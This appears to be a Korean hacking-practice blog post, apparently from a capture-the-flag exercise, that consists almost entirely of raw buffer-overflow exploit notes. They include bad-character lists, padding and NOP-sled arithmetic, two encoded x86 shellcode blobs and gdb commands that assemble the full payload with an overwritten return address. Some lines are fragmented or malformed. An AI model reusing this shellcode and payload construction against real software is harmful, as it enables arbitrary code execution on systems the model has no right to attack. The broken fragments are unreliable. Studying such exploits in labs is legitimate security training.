\x00\x09\x0a\x20
"\xda\xca\xba\xe4\x11\xd4\x5d\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
"\x12\x31\x50\x17\x03\x50\x17\x83\x24\x15\x36\xa8\x95\xcd\x41"
\xad\xec\xa
0\x04\x5a\x22\xa2”
0xfffffffff
F A9AA AAAE
0xfa9aaaaae
Buffer = "\x55" * (1040 - 124 - 95 - 4) = 817
NOPs = "\x90" * 124
Shellcode = "\xd9\xeb\xd9\x74\x24\xf4\xb8\x5d\x41\x80\x61\x5b\x2b\xc9\xb1\x12\x31\x43\x17\x03\x43\x17\x83\xb6\xbd\x62\x94\x79\xe5\x94\xb4\x2a\x5a\x08\x51\xce\xd5\x4f\x15\xa8\x28\x0f\xc5\x6d\x03\x2f\x27\x0d\x2a\x29\x4e\x65\xa7\xc3\xbe\x52\xdf\xd1\xbe\x8a\x3
1\x5f\x5f\x02\x2b\x0f\xf1\x31\x07\xac\x78\x54\xaa\x33\x28\xfe\x5b\x1b\xbe\x96\xcb\x4c\x6f\x04\x65\x1a\x8c\x9a\x26\x95\xb2\xaa\xc2\x68\xb4"
EIP = "\x66" * 4'
(gdb) run $(python -c 'print "\x55" * (1040 - 124 - 95 - 4) + "\x90" * 124 + "\xd9\xeb\xd9\x74\x24\xf4\xb8\x5d\x41\x80\x61\x5b\x2b\xc9\xb1\x12\x31\x43\x17\x03\x43\x17\x83\xb6\xbd\x62\x94\x79\xe5\x94\xb4\x2a\x5a\x08\x51\xce\xd5\x4f\x15\xa8\x28\x0f\xc5\x6d\x03\x2f\x27\x0d\x2a\x29\x4e\x65\xa7\xc3\xbe\x52\xdf\xd1\xbe\x8a\x31\x5f\x5f\x02\x2b\x0f\xf1\x31\x07\xac\x78\x54\xaa\x33\x28\xfe\x5b\x1b\xbe\x96\xcb\x4c\x6f\x04\x65\x1a\x8c\x9a\x26\x95\xb2\xaa\xc2\x68\xb4" + "\x66" * 4')
"\xd9\xeb\xd9\x74\x2
4\xf4\xb8\x5d\x41\x80\x61\x5b\x2b\xc9\xb1\x12\x31\x43\x17\x03\x43\x17\x83\xb6\xbd\x62\x94\x79\xe5\x94\xb4\x2a\x5a\x08\x51\xce\xd5\x4f\x15\xa8\x28\x0f\xc5\x6d\x03\x2f\x27\x0d\x2a\x29\x4e\x65\xa7\xc3\xbe\x52\xdf\xd1\xbe\x8a\x31\x5f\x5f\x02\x2b\x0f\xf1\x31\x07\xac\x78\x54\xaa\x33\x28\xfe\x5b\x1b\xbe\x96\xcb\x4c\x6f\x04\x65\x1a\x8c\x9a\x26\x95\xb2\xaa\xc2\x68\xb4"
"\xbe\x16\xc1\x29\xb2\xd9\xce\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x12\x83\xc3\x04\x31\x73\x0e\x03\x65\xcf\xcb\x47\xb8\x14\xfc\x4b\xe9\xe9\x50\xe6\x0f\x67\xb7\x46\x69\xba\xb8\x34\x2c\xf4\x86\xf7\x4e\xbd\x81\xfe\x26\x41\x72\x01\xb7\xd5\x70\x01\xcd\x4c
\xfc\xe0\x81\xe9\xae\xb3\xb2\x46\x4d\xbd\xd5\x64\xd2\xef\x7d\x19\xfc\x7c\x15\x8d\x2d\xac\x87\x24\xbb\x51\x15\xe4\x32\x74\x29\x01\x88\xf7"
(gdb) run $(python -c 'print "\x55" *
(1040 - 124 - 95 - 4) + "\x90" * 124 + "\xbe\x16\xc1\x29\xb2\xd9\xce\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x12\x83\xc3\x04\x31\x73\x0e\x03\x65\xcf\xcb\x47\xb8\x14\xfc\x4b\xe9\xe9\x50\xe6\x0f\x67\xb7\x46\x69\xba\xb8\x34\x2c\xf4\x86\xf7\x4e\xbd\x81\xfe\x26\x41
\x72\x01\xb7\xd5\x70\x01\xcd\x4c\xfc\xe0\x81\xe9\xae\xb3\xb2\x46\x4d\xbd\xd5\x64\xd2\xef\x7d\x19\xfc\x7c\x15\x8d\x2d\xac\x87\x24\xbb\x51\x15\xe4\x32\x74\x29\x01\x88\xf7" + "\x66" * 4')
'호그와트' 카테고리의 다른 글
컴퓨터와 디악초프라 (1) | 2022.12.16 |
---|---|
우리 모두 홍진호가 되어봅시다 우리 모두 홍진호가 되어봅시다 (1) | 2022.12.15 |
태양계 영어 이름으로 출력 (0) | 2022.12.14 |
와이어샤크 정도는 기본적으로 다룰 줄 알아야 해커가 아닐까요? (0) | 2022.12.14 |
Hack the box Optimistic (0) | 2022.12.13 |